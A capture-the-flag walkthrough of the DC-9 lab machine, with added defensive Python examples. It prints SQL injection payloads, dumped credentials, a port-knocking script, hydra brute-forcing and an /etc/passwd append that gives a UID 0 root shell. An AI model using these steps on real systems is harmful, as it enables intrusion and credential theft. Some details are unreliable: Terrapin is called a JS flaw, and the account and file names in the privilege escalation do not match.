PWN Using Port Knocking
Footprinting
nmap
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
Nuclei
"Apache/2.4.38 (Debian)"
This is an outdated version. Nuclei also flags "Vulnerable to Terrapin", which is a JS vulnerability. That is odd considering I don’t see port 22, and I don’t see JS, only PHP.
Re-running nmap with -Pn shows port 22.
Very interesting that the SSH port is being hidden, hmmmm.
Web Page
From here we discover a SQLi vulnerability in the search functionality.
SqlMap
sqlmap -u "http://192.168.225.209:80/results.php" --dbms=mysql --level=5 --risk=3 --threads=10 --data="search=mary"
We get:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 8722=8722-- Fakp
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 3242 FROM (SELECT(SLEEP(5)))KpNU)-- KIKf
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627871,0x51674c596f68454877516151695264574c49704975756372514e714245425657556562584e45577a,0x717a626b71),NULL,NULL,NULL-- -
---
Dumping the staff details table (columns, left to right: id, email, phone, last name, registration date, first name, position) gives:
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
Let’s try to attack this.
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
The admin account is stored with a 32-character hex (MD5) hash, which cracks to transorbital1:
856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin
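As an added example (not code from the writeup or from the box's results.php), here is a Python/sqlite3 stand-in for the search: the query built by string interpolation, which is the defect sqlmap found, next to the same query with a bound parameter. The staff table and its rows are constructed; the boolean-based payload is the one sqlmap reported above, and the 8722=8723 twin shows the true/false difference in row counts that boolean-based blind injection depends on. With the parameterised query that difference disappears, because the whole term is compared as data.

```python
import sqlite3

# Constructed stand-in for the staff table the page dumps (not the box's real schema).
SAMPLE_ROWS = [
    (1, "marym", "Mary", "CEO"),
    (2, "julied", "Julie", "Human Resources"),
    (3, "fredf", "Fred", "Systems Administrator"),
]

# Payloads: the boolean-based one sqlmap reported, its false twin, and a tautology.
PAYLOAD_TRUE = "mary' AND 8722=8722-- Fakp"
PAYLOAD_FALSE = "mary' AND 8722=8723-- Fakp"
PAYLOAD_ALL = "x' OR 1=1-- "


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE staff (id INTEGER, username TEXT, firstname TEXT, position TEXT)"
    )
    conn.executemany("INSERT INTO staff VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, term):
    """The term is spliced into the SQL text, so whatever it contains is parsed as SQL."""
    sql = "SELECT id, firstname, position FROM staff WHERE firstname LIKE '%s'" % term
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The term is passed as a bound parameter, so it is only ever compared as data."""
    sql = "SELECT id, firstname, position FROM staff WHERE firstname LIKE ?"
    return conn.execute(sql, (term,)).fetchall()


def compare(conn):
    """Row counts (vulnerable, parameterised) each version returns for the same inputs."""
    inputs = {"plain": "mary", "true": PAYLOAD_TRUE, "false": PAYLOAD_FALSE, "all": PAYLOAD_ALL}
    return {
        name: (len(search_vulnerable(conn, term)), len(search_safe(conn, term)))
        for name, term in inputs.items()
    }


if __name__ == "__main__":
    for name, (vuln, safe) in compare(make_db()).items():
        print(f"{name:6} vulnerable={vuln} parameterised={safe}")
```

The vulnerable version returns 1 row for the "true" payload and 0 for the "false" one, which is the oracle sqlmap used; the tautology returns every row. The parameterised version returns 0 rows for all three payloads and 1 row for a plain "mary". Running the application's database user with SELECT-only rights on the tables it needs would additionally have kept the UNION dump of the users table out of reach.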
SSH open with Port Knocking
Open the port with a knock script:
#!/bin/bash
# Knock sequences used by the target and the SSH port they guard
OPEN_SEQUENCE="7469 8475 9842"
CLOSE_SEQUENCE="9842 8475 7469"
SSH_PORT=22

# Insert an iptables rule on the host running this script that accepts
# TCP/$SSH_PORT from the given IP (this only touches the local firewall)
open_port() {
    local ip="$1"
    iptables -I INPUT -s "$ip" -p tcp --dport "$SSH_PORT" -j ACCEPT
}

# Remove that rule again
close_port() {
    local ip="$1"
    iptables -D INPUT -s "$ip" -p tcp --dport "$SSH_PORT" -j ACCEPT
}

# Send one SYN to each port of the sequence, in order, half a second apart
knock() {
    local ip="$1" sequence="$2" port
    for port in $sequence; do
        hping3 -S -p "$port" -c 1 "$ip" >/dev/null 2>&1
        sleep 0.5
    done
}

# hping3 (raw sockets) and iptables both need root
if [ "$EUID" -ne 0 ]; then
    echo "This script must be run as root" >&2
    exit 1
fi

read -r -p "Enter the IP address: " IP

# Knock the open sequence, then allow SSH from that IP locally
knock "$IP" "$OPEN_SEQUENCE"
open_port "$IP"
echo "Port $SSH_PORT opened for IP $IP"

# Stay running until Enter is pressed, then reverse both steps
read -r -p "Press Enter to close the port..."
knock "$IP" "$CLOSE_SEQUENCE"
close_port "$IP"
echo "Port $SSH_PORT closed for IP $IP"
Keep this running to keep the port open!
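Seen from the server side, the same sequence is sitting in the firewall log. As an added example (not part of the writeup, and not knockd's own code), this Python script reads constructed iptables LOG lines, written here with a made-up "KNOCK" log prefix, and reports every source address that completes 7469, 8475, 9842 in order within a time window, resetting on a wrong port, an out-of-order port or a stale first knock. Defenders can use it to alert on knocks from unexpected addresses; it also shows that the sequence travels in the clear and can be recovered from any log or capture, so port knocking hides the SSH port but does not authenticate the client, and key-based SSH authentication still has to do that job.

```python
import re

# Knock sequence from the script above and how long a sequence may take (seconds).
KNOCK_SEQUENCE = (7469, 8475, 9842)
WINDOW_SECONDS = 10.0

# Pulls the kernel uptime stamp, source address and destination port from an
# iptables LOG line, and only matches TCP packets carrying the SYN flag.
LOG_RE = re.compile(
    r"\[\s*(?P<ts>\d+\.\d+)\].*?SRC=(?P<src>[\d.]+).*?PROTO=TCP.*?DPT=(?P<dpt>\d+).*?\bSYN\b"
)

# Constructed log lines (the "KNOCK" prefix is assumed; real prefixes are set by --log-prefix).
_L = "Mar  4 10:11:0{s} dc-9 kernel: [  {ts}] KNOCK IN=eth0 OUT= SRC={src} DST=10.0.0.209 LEN=40 PROTO={proto} SPT=4000{s} DPT={dpt} WINDOW=512 {flags} URGP=0"
SAMPLE_LOG = [
    # 10.0.0.5 completes the sequence in one second
    _L.format(s=2, ts="100.000000", src="10.0.0.5", proto="TCP", dpt=7469, flags="SYN"),
    _L.format(s=2, ts="100.500000", src="10.0.0.5", proto="TCP", dpt=8475, flags="SYN"),
    _L.format(s=3, ts="101.000000", src="10.0.0.5", proto="TCP", dpt=9842, flags="SYN"),
    # 10.0.0.9 hits the right ports in the wrong order
    _L.format(s=7, ts="105.000000", src="10.0.0.9", proto="TCP", dpt=7469, flags="SYN"),
    _L.format(s=7, ts="105.500000", src="10.0.0.9", proto="TCP", dpt=9842, flags="SYN"),
    _L.format(s=8, ts="106.000000", src="10.0.0.9", proto="TCP", dpt=8475, flags="SYN"),
    # 10.0.0.7 waits 20 s between the first and second knock
    _L.format(s=1, ts="200.000000", src="10.0.0.7", proto="TCP", dpt=7469, flags="SYN"),
    _L.format(s=1, ts="220.000000", src="10.0.0.7", proto="TCP", dpt=8475, flags="SYN"),
    _L.format(s=2, ts="221.000000", src="10.0.0.7", proto="TCP", dpt=9842, flags="SYN"),
    # UDP to a knock port and an ACK-only segment are not knocks
    _L.format(s=3, ts="230.000000", src="10.0.0.5", proto="UDP", dpt=7469, flags="SYN"),
    _L.format(s=4, ts="231.000000", src="10.0.0.5", proto="TCP", dpt=22, flags="ACK"),
]


def parse_line(line):
    """Return (timestamp, source, destination port) for a TCP SYN log line, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return float(m.group("ts")), m.group("src"), int(m.group("dpt"))


def detect_knocks(lines, sequence=KNOCK_SEQUENCE, window=WINDOW_SECONDS):
    """Return (source, completion time) for every completed knock sequence, in log order."""
    progress = {}  # source -> (index of the next expected port, time of the first knock)
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dpt = parsed
        idx, started = progress.get(src, (0, ts))
        if idx and ts - started > window:
            idx = 0  # took too long: the partial sequence expires
        if dpt == sequence[idx]:
            started = ts if idx == 0 else started
            idx += 1
        elif dpt == sequence[0]:
            idx, started = 1, ts  # wrong port, but it restarts a fresh sequence
        else:
            idx = 0
        if idx == len(sequence):
            hits.append((src, ts))
            idx = 0
        progress[src] = (idx, started)
    return hits


if __name__ == "__main__":
    for src, ts in detect_knocks(SAMPLE_LOG):
        print(f"knock sequence completed by {src} at uptime {ts:.1f}s")
```

On a real host the same function can be fed `journalctl -k` output, provided the knock ports are logged with an iptables LOG rule; only 10.0.0.5 is reported for the constructed lines above.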
SSH Login
hydra -L usr.list -P pass.list ssh://192.168.191.209
We found:
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
In the janitor user's home directory we found:
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 May 4 10:11 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 May 4 10:11 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/ls
-bash: cd: .secrets-for-putin/ls: No such file or directory
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$ exit
Let’s use hydra again with these passwords for the admin, fredf:
[22][ssh] host: 192.168.191.209 login: fredf password: B4-Tru3-001
User Flag
ssh fredf@192.168.191.209
fredf@192.168.191.209's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ ls
local.txt
fredf@dc-9:~$ cat local.txt
SECRET
fredf@dc-9:~$
PrivEsc
fredf can run /opt/devstuff/dist/test/test as root via sudo, and it appends the contents of its first argument to the file named by its second. A crafted passwd entry with UID 0 and a crypt() hash in the password field can therefore be appended to /etc/passwd:
newuser:asutCwo2E2oVA:0:0:newuser:/root:/bin/bash
fredf@dc-9:~$ nano pass2
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test pass2.txt /etc/passwd
fredf@dc-9:~$ su pwned
Password:
su: Authentication failure
fredf@dc-9:~$ su pwned
Password:
su: Authentication failure
fredf@dc-9:~$ su pwned
Password:
root@dc-9:/home/fredf# cd ../../
root@dc-9:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@dc-9:/# cd root
root@dc-9:~# ls
proof.txt
root@dc-9:~# cat proof.txt
SECRET
root@dc-9:~#
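As an added example (not from the writeup), a small Python audit that parses /etc/passwd and flags what this privilege escalation leaves behind: a second UID 0 account, a password hash stored in the passwd file instead of /etc/shadow, and, more generally, empty password fields and malformed lines. The sample file content is constructed around the line the walkthrough appended; run it with a path argument to check a live host.

```python
import sys

# Constructed /etc/passwd excerpt: normal entries plus the line the walkthrough appended.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001:Fred Flintstone,,,:/home/fredf:/bin/bash
newuser:asutCwo2E2oVA:0:0:newuser:/root:/bin/bash
"""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Yield one dict per entry; lines that are not 7 fields with numeric ids are marked malformed."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            yield {"name": parts[0], "line": lineno, "malformed": True}
            continue
        entry = dict(zip(FIELDS, parts))
        entry["uid"] = int(entry["uid"])
        entry["gid"] = int(entry["gid"])
        entry["line"] = lineno
        yield entry


def audit_passwd(text):
    """Return (account, reason) pairs for every entry worth a closer look, in file order."""
    findings = []
    for e in parse_passwd(text):
        if e.get("malformed"):
            findings.append((e["name"], "malformed entry"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
        pw = e["pw"]
        if pw == "":
            findings.append((e["name"], "empty password field"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # 'x' defers to /etc/shadow; '*' and '!...' are locked. Anything else is a usable hash.
            findings.append((e["name"], "password hash stored in /etc/passwd"))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for account, reason in audit_passwd(text):
        print(f"{account}: {reason}")
```

For the constructed sample the audit reports newuser twice, once for UID 0 and once for the hash. The root cause on the box is the sudoers rule that lets a user run a file-appending binary as root, so reviewing `sudo -l` output for entries that grant root to programs that write to caller-chosen paths is the complementary check, and a file-integrity monitor on /etc/passwd, /etc/shadow and /etc/sudoers catches the append itself.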